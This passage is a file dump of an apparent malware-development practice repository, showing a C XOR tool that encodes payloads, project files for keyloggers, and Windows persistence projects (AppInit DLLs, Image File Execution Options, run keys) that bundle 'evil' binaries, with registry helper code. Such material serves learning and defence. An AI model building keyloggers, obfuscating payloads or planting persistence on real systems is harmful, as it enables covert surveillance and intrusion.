20 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x86.ActiveCfg = Release|Win32
21 | {0306B084-8237-4C80-B697-1C8C1222E120}.Release|x86.Build.0 = Release|Win32
22 | EndGlobalSection
23 | GlobalSection(SolutionProperties) = preSolution
24 | HideSolutionNode = FALSE
25 | EndGlobalSection
26 | GlobalSection(ExtensibilityGlobals) = postSolution
27 | SolutionGuid = {9374940C-EA6A-4C2B-BB73-6FCE4F21E5D4}
28 | EndGlobalSection
29 | EndGlobal
30 |
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption/simple-encryption.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #pragma warning(disable : 4996)
5 |
6 | // XOR Cipher
7 |
8 | void printf_usage(char* str)
9 | {
10 | printf(" [+] Usage: %s \n", str);
11 | }
12 |
13 | int isValidXorKey(const char* key)
14 | {
15 | // xor key must be a numberic
16 | int len = strlen(key);
17 | for (int i = 0; i < len; i++)
18 | if (key[i] < '0' || key[i] > '9')
19 | return 0;
20 | return 1;
21 | }
22 |
23 | unsigned long long getSizeOfFile(char* filename)
24 | {
25 | FILE* fptr = NULL;
26 | unsigned long long sizeOfFile = 0;
27 | if ((fptr = fopen(filename, "rb")) == NULL) {
28 | printf(" [-] Error! Opening file \'%s\' for calculating size.\n", filename); exit(2);
29 | }
30 |
31 | fseek(fptr, 0L, SEEK_END);
32 | sizeOfFile = ftell(fptr);
33 | fclose(fptr);
34 | return sizeOfFile;
35 | }
36 |
37 | void readFileBinary(char* buffer, char* filename, unsigned long long filesize)
38 | {
39 | FILE* fptr = NULL;
40 | unsigned long long numberOfBytes = 0;
41 |
42 | if ((fptr = fopen(filename, "rb")) == NULL) {
43 | printf(" [-] Error! Opening file \'%s\' for reading.\n", filename); exit(2);
44 | }
45 |
46 | numberOfBytes = fread(buffer, 1, filesize, fptr);
47 | if (numberOfBytes != filesize) {
48 | printf(" [-] Error! Reading file\n"); exit(3);
49 | }
50 |
51 | fclose(fptr);
52 | }
53 |
54 | void writeFileBinary(char* buffer, char* filename, unsigned long long filesize)
55 | {
56 | FILE* fptr = NULL;
57 | unsigned long long numberOfBytes = 0;
58 |
59 | if ((fptr = fopen(filename, "wb")) == NULL) {
60 | printf(" [-] Error! Opening file \'%s\' for writing.\n", filename); exit(2);
61 | }
62 |
63 | numberOfBytes = fwrite(buffer, 1, filesize, fptr);
64 | if (numberOfBytes != filesize) {
65 | printf(" [-] Error! Writing file\n"); exit(4);
66 | }
67 |
68 | fclose(fptr);
69 | }
70 |
71 | void bufferEncoding(char* buffer, int xorKey, unsigned long long filesize)
72 | {
73 | unsigned long long i;
74 | for (i = 0; i < filesize; i++)
75 | buffer[i] ^= xorKey;
76 | }
77 |
78 | int main(int argc, char const* argv[])
79 | {
80 | // Get program name
81 | char progName[50];
82 | char* lastToken = strrchr(argv[0], '\\');
83 |
84 | if (lastToken != NULL) strcpy(progName, lastToken + 1);
85 | else strcpy(progName, argv[0]);
86 |
87 | // Check arguments
88 | if (argc != 4) {
89 | printf_usage(progName); exit(5);
90 | }
91 |
92 | char fileIn[50], fileOut[50];
93 | int xorKey = 0;
94 |
95 | // Parsing arguments
96 | strcpy(fileIn, argv[1]);
97 | if (isValidXorKey(argv[2])) {
98 | xorKey = atoi(argv[2]);
99 | }
100 | else {
101 | printf(" [-] Error! Invalid key. The encrypt key must be numberic!\n"); exit(5);
102 | }
103 | strcpy(fileOut, argv[3]);
104 |
105 | char* buffer = NULL;
106 | unsigned long long sizeOfFile = 0;
107 |
108 | // Obtain file size
109 | sizeOfFile = getSizeOfFile(fileIn);
110 |
111 | // Allocate memory to contain the whole file
112 | buffer = (char*)malloc(sizeOfFile * sizeof(char));
113 | if (buffer == NULL) {
114 | printf(" [-] Error! Memory not allocated.\n"); exit(3);
115 | }
116 |
117 | // Reading file to buffer
118 | readFileBinary(buffer, fileIn, sizeOfFile);
119 |
120 | // Encoding payload
121 | bufferEncoding(buffer, xorKey, sizeOfFile);
122 |
123 | // Write buffer to new file
124 | writeFileBinary(buffer, fileOut, sizeOfFile);
125 |
126 | // Terminate
127 | free(buffer);
128 |
129 | return 0;
130 | }
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption/simple-encryption.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-encryption/simple-encryption/simple-encryption.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-keylogger/hooking-keylogger/hooking-keylogger.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-keylogger/hooking-keylogger/hooking-keylogger.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-keylogger/polling-keylogger/polling-keylogger.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 |
--------------------------------------------------------------------------------
/simple-keylogger/polling-keylogger/polling-keylogger.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-keylogger/release/x64/hooking-keylogger.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-keylogger/release/x64/hooking-keylogger.zip
--------------------------------------------------------------------------------
/simple-keylogger/release/x64/polling-keylogger.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-keylogger/release/x64/polling-keylogger.zip
--------------------------------------------------------------------------------
/simple-keylogger/simple-keylogger.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.2.32519.379
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "polling-keylogger", "polling-keylogger\polling-keylogger.vcxproj", "{2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hooking-keylogger", "hooking-keylogger\hooking-keylogger.vcxproj", "{A6F84978-B82E-447D-AE53-81153A32D80F}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Debug|x64.ActiveCfg = Debug|x64
19 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Debug|x86.ActiveCfg = Debug|Win32
20 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x64.ActiveCfg = Release|x64
21 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x64.Build.0 = Release|x64
22 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x86.ActiveCfg = Release|Win32
23 | {2711B1BB-9FA8-4CE6-A497-16AB8F861FD0}.Release|x86.Build.0 = Release|Win32
24 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Debug|x64.ActiveCfg = Debug|x64
25 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Debug|x86.ActiveCfg = Debug|Win32
26 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x64.ActiveCfg = Release|x64
27 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x64.Build.0 = Release|x64
28 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x86.ActiveCfg = Release|Win32
29 | {A6F84978-B82E-447D-AE53-81153A32D80F}.Release|x86.Build.0 = Release|Win32
30 | EndGlobalSection
31 | GlobalSection(SolutionProperties) = preSolution
32 | HideSolutionNode = FALSE
33 | EndGlobalSection
34 | GlobalSection(ExtensibilityGlobals) = postSolution
35 | SolutionGuid = {2D1B326E-B37B-4CE1-AA01-B98BA2CBBB29}
36 | EndGlobalSection
37 | EndGlobal
38 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/appinit-dlls/appinit-dlls.aps
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.dll"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/appinit-dlls.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/bin/evil.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/appinit-dlls/bin/evil.dll
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/reg/Windows.reg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/appinit-dlls/reg/Windows.reg
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/registry.c:
--------------------------------------------------------------------------------
1 | #include "registry.h"
2 |
3 | /*
4 | * Example to used:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
31 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
32 | {
33 | DWORD dwDisposition; // It verify new key is created or open existing key
34 | HKEY hKey;
35 | DWORD Ret;
36 |
37 | Ret = RegCreateKeyExW(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
38 | if (Ret != ERROR_SUCCESS) {
39 | printf(" [-] Error Opening or Creating new key. Code = %d\n", GetLastError());
40 | return FALSE;
41 | }
42 | //close the key
43 | RegCloseKey(hKey);
44 | return TRUE;
45 | }
46 |
47 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
48 | {
49 | DWORD Ret;
50 | HKEY hKey;
51 | // Open the key
52 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
53 | if (Ret == ERROR_SUCCESS) {
54 | // Set the value in key
55 | if (ERROR_SUCCESS != RegSetValueExW(hKey, valueName, 0, REG_DWORD, (LPBYTE)&data, sizeof(data))) {
56 | RegCloseKey(hKey);
57 | return FALSE;
58 | }
59 | // Close the key
60 | RegCloseKey(hKey);
61 | return TRUE;
62 | }
63 | return FALSE;
64 | }
65 |
66 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData)
67 | {
68 | DWORD Ret;
69 | HKEY hKey;
70 | // Open the key
71 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
72 | if (Ret == ERROR_SUCCESS) {
73 | if (ERROR_SUCCESS != RegSetValueExW(hKey, valueName, 0, REG_SZ, (LPBYTE)(strData), ((((DWORD)lstrlen(strData) + 1)) * 2))) {
74 | RegCloseKey(hKey);
75 | return FALSE;
76 | }
77 | RegCloseKey(hKey);
78 | return TRUE;
79 | }
80 | return FALSE;
81 | }
82 |
83 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData)
84 | {
85 | HKEY hKey;
86 | DWORD Ret;
87 | // Check if the registry exists
88 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
89 | if (Ret == ERROR_SUCCESS) {
90 | DWORD data;
91 | DWORD len = sizeof(DWORD); // size of data
92 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (LPBYTE)(&data), &len);
93 | if (Ret == ERROR_SUCCESS) {
94 | RegCloseKey(hKey);
95 | (*readData) = data;
96 | return TRUE;
97 | }
98 | RegCloseKey(hKey);
99 | return TRUE;
100 | }
101 | else {
102 | return FALSE;
103 | }
104 | }
105 |
106 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData)
107 | {
108 | // Read customer infromation from the registry
109 | HKEY hKey;
110 | DWORD len = TOTAL_BYTES_READ;
111 | DWORD readDataLen = len;
112 | PWCHAR readBuffer = (PWCHAR)malloc(sizeof(PWCHAR) * len);
113 |
114 | if (readBuffer == NULL)
115 | return FALSE;
116 | // Check if the registry exists
117 | DWORD Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_READ, &hKey);
118 | if (Ret == ERROR_SUCCESS) {
119 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
120 | while (Ret == ERROR_MORE_DATA)
121 | {
122 | // Get a buffer that is big enough.
123 | len += OFFSET_BYTES;
124 | readBuffer = (PWCHAR)realloc(readBuffer, len);
125 | readDataLen = len;
126 | Ret = RegQueryValueExW(hKey, valueName, NULL, NULL, (BYTE*)readBuffer, &readDataLen);
127 | }
128 | if (Ret != ERROR_SUCCESS) {
129 | RegCloseKey(hKey);
130 | return FALSE;;
131 | }
132 | *readData = readBuffer;
133 | RegCloseKey(hKey);
134 | return TRUE;
135 | }
136 | else {
137 | return FALSE;
138 | }
139 | }
140 |
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/registry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "AdvAPI32.Lib")
6 |
7 | #define TOTAL_BYTES_READ 1024
8 | #define OFFSET_BYTES 1024
9 |
10 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
11 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
12 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
13 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
14 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/appinit-dlls/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by appinit-dlls.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/image-file-execution-options/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.aps:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/image-file-execution-options/image-file-execution-options.aps
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.rc:
--------------------------------------------------------------------------------
1 | // Microsoft Visual C++ generated resource script.
2 | //
3 | #include "resource.h"
4 |
5 | #define APSTUDIO_READONLY_SYMBOLS
6 | /////////////////////////////////////////////////////////////////////////////
7 | //
8 | // Generated from the TEXTINCLUDE 2 resource.
9 | //
10 | #include "winres.h"
11 |
12 | /////////////////////////////////////////////////////////////////////////////
13 | #undef APSTUDIO_READONLY_SYMBOLS
14 |
15 | /////////////////////////////////////////////////////////////////////////////
16 | // English (United States) resources
17 |
18 | #if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
19 | LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
20 | #pragma code_page(1252)
21 |
22 | #ifdef APSTUDIO_INVOKED
23 | /////////////////////////////////////////////////////////////////////////////
24 | //
25 | // TEXTINCLUDE
26 | //
27 |
28 | 1 TEXTINCLUDE
29 | BEGIN
30 | "resource.h\0"
31 | END
32 |
33 | 2 TEXTINCLUDE
34 | BEGIN
35 | "#include ""winres.h""\r\n"
36 | "\0"
37 | END
38 |
39 | 3 TEXTINCLUDE
40 | BEGIN
41 | "\r\n"
42 | "\0"
43 | END
44 |
45 | #endif // APSTUDIO_INVOKED
46 |
47 |
48 | /////////////////////////////////////////////////////////////////////////////
49 | //
50 | // BIN
51 | //
52 |
53 | IDR_BIN1 BIN "bin\\evil.exe"
54 |
55 | #endif // English (United States) resources
56 | /////////////////////////////////////////////////////////////////////////////
57 |
58 |
59 |
60 | #ifndef APSTUDIO_INVOKED
61 | /////////////////////////////////////////////////////////////////////////////
62 | //
63 | // Generated from the TEXTINCLUDE 3 resource.
64 | //
65 |
66 |
67 | /////////////////////////////////////////////////////////////////////////////
68 | #endif // not APSTUDIO_INVOKED
69 |
70 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
26 |
27 | Header Files
28 |
29 |
30 | Header Files
31 |
32 |
33 |
34 |
35 | Resource Files
36 |
37 |
38 |
39 |
40 |
41 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/image-file-execution-options.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/registry.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #pragma comment(lib, "AdvAPI32.Lib")
6 |
7 | #define TOTAL_BYTES_READ 1024
8 | #define OFFSET_BYTES 1024
9 |
10 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey);
11 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data);
12 | BOOL WriteStringToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR strData);
13 | BOOL ReadDwordFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD* readData);
14 | BOOL ReadStringFromRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, PWCHAR* readData);
--------------------------------------------------------------------------------
/simple-persistence/image-file-execution-options/resource.h:
--------------------------------------------------------------------------------
1 | //{{NO_DEPENDENCIES}}
2 | // Microsoft Visual C++ generated include file.
3 | // Used by image-file-execution-options.rc
4 | //
5 | #define IDR_BIN1 101
6 |
7 | // Next default values for new objects
8 | //
9 | #ifdef APSTUDIO_INVOKED
10 | #ifndef APSTUDIO_READONLY_SYMBOLS
11 | #define _APS_NEXT_RESOURCE_VALUE 102
12 | #define _APS_NEXT_COMMAND_VALUE 40001
13 | #define _APS_NEXT_CONTROL_VALUE 1001
14 | #define _APS_NEXT_SYMED_VALUE 101
15 | #endif
16 | #endif
17 |
--------------------------------------------------------------------------------
/simple-persistence/release/x64/appinit-dlls.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/appinit-dlls.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/image-file-execution-options.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/image-file-execution-options.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/run-registry.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/run-registry.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/scheduled-task.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/scheduled-task.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/startup-folder.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/startup-folder.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/windows-service.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/windows-service.zip
--------------------------------------------------------------------------------
/simple-persistence/release/x64/winlogon-registry.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/release/x64/winlogon-registry.zip
--------------------------------------------------------------------------------
/simple-persistence/run-registry/bin/evil.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/hailehong95/practice-maldev/4f7ca55a2815dc2612ada55b0e775c099c3ff349/simple-persistence/run-registry/bin/evil.exe
--------------------------------------------------------------------------------
/simple-persistence/run-registry/registry.c:
--------------------------------------------------------------------------------
1 | #include "registry.h"
2 |
3 | /*
4 | * Example to used:
5 | BOOL status;
6 | DWORD readData;
7 | PWCHAR readMessage = nullptr;
8 |
9 | status = CreateRegistryKey(HKEY_CURRENT_USER, "Aticleworld"); //create key
10 | if (status != TRUE) return FALSE;
11 |
12 | status = WriteDwordInRegistry(HKEY_CURRENT_USER, "Aticleworld","date",12082016); //write dword
13 | if (status != TRUE) return FALSE;
14 |
15 | status = readDwordValueRegistry(HKEY_CURRENT_USER, "Aticleworld", "date", &readData); //read dword
16 | if (status != TRUE) return FALSE;
17 | printf("%ld", readData);
18 |
19 | status = writeStringInRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", "Happy"); //write string
20 | if (status != TRUE) return FALSE;
21 |
22 | status = readUserInfoFromRegistry(HKEY_CURRENT_USER, "Aticleworld", "Message", &readMessage); //read string
23 | if (status != TRUE) return FALSE;
24 | if (readMessage != nullptr) {
25 | printf(" Message = %S\n", readMessage);
26 | free(readMessage);
27 | readMessage = nullptr;
28 | }
29 | */
30 |
31 | BOOL CreateRegistryKey(HKEY hKeyParent, PWCHAR subkey)
32 | {
33 | DWORD dwDisposition; // It verify new key is created or open existing key
34 | HKEY hKey;
35 | DWORD Ret;
36 |
37 | Ret = RegCreateKeyExW(hKeyParent, subkey, 0, NULL, REG_OPTION_NON_VOLATILE, KEY_ALL_ACCESS, NULL, &hKey, &dwDisposition);
38 | if (Ret != ERROR_SUCCESS) {
39 | printf(" [-] Error Opening or Creating new key. Code = %d\n", GetLastError());
40 | return FALSE;
41 | }
42 | //close the key
43 | RegCloseKey(hKey);
44 | return TRUE;
45 | }
46 |
47 | BOOL WriteDwordToRegistry(HKEY hKeyParent, PWCHAR subkey, PWCHAR valueName, DWORD data)
48 | {
49 | DWORD Ret;
50 | HKEY hKey;
51 | // Open the key
52 | Ret = RegOpenKeyExW(hKeyParent, subkey, 0, KEY_WRITE, &hKey);
53 | if (Ret == ERROR_SUCCESS) {
54 | // Set the value in key
